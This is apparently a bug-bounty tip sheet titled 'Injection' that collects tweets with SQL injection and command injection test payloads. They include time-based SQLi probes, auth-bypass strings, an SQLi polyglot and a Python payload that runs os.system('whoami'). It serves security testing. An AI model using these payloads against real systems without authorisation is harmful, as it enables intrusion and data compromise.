# Injection * [#**BugBountyTip** did you know that the character '\_' acts like the regex character '.' in SQL queries https://www.w3resource.com/sql/wildcards-like-operator/wildcards-underscore.php …](https://twitter.com/gwendallecoguic/status/1076081365777551364) * [#bugbountytip It's possible to fire up "#OS #Command #Injection" instead of #XSS in Filename.PDF?parameter=PAYLOAD+|+Dir+c:\\](https://twitter.com/fasthm00/status/1087256089630896128) * [#bugbountytips When you're trying to trigger a Command Injection flaw in #Python Web Application try to surround your payload with str() funciton i.e "%2bstr(\_\_import.('os').system('whoami'))%2b"](https://twitter.com/fasthm00/status/1087557729797824512) * [Use Burp Intruder for Expression Language Injection and grep the response for 7744 :) ](https://twitter.com/secalert/status/1119526862521282560) * [I found two SQL Injections tonight in private programs. One blind and the other hanging in plain sight. Here’s a tip. Wayback -> http://company.com -> grep | .php?id= ](https://twitter.com/chevonphillip/status/1237968363764187143) * [Give this a try while testing for SQLi Authentication Bypass :](https://twitter.com/SpiderSec/status/1251793902996279297) [username: '--' / "--" password: '--' / "--"](https://twitter.com/SpiderSec/status/1251793902996279297) * [Basic payload to test SQLi in Burp Repeater: '; waitfor delay '0:0:3' -- Check the time in the Response side if it delays the same as you change the seconds in the payload.![Image](https://pbs.twimg.com/media/EIkgLMAXUAETnq7?format=png\&name=small)](https://twitter.com/Gamliel_InfoSec/status/1191518957838196737)![Image](https://pbs.twimg.com/media/EIkgLMAXUAETnq7?format=png\&name=small) * [This is how I found sql-Injection 100% of the time For http://site.com/?q=HERE /?q=1 /?q=1' /?q=1" /?q=\[1\] /?q\[\]=1 /?q=1\` /?q=1\ /?q=1/\*'\*/ /?q=1/\*!1111'\*/ /?q=1'||'asd'||' <== concat string /?q=1' or '1'='1 /?q=1 or 1=1 /?q='or''=' #bugbounty #BugBountyTips](https://twitter.com/pwntheweb/status/1253224265853198336) * SQLi Polyglot SLEEP(1) /\*‘ or SLEEP(1) or ‘“ or SLEEP(1) or “\*/ by[@avlidienbrunn](https://twitter.com/avlidienbrunn)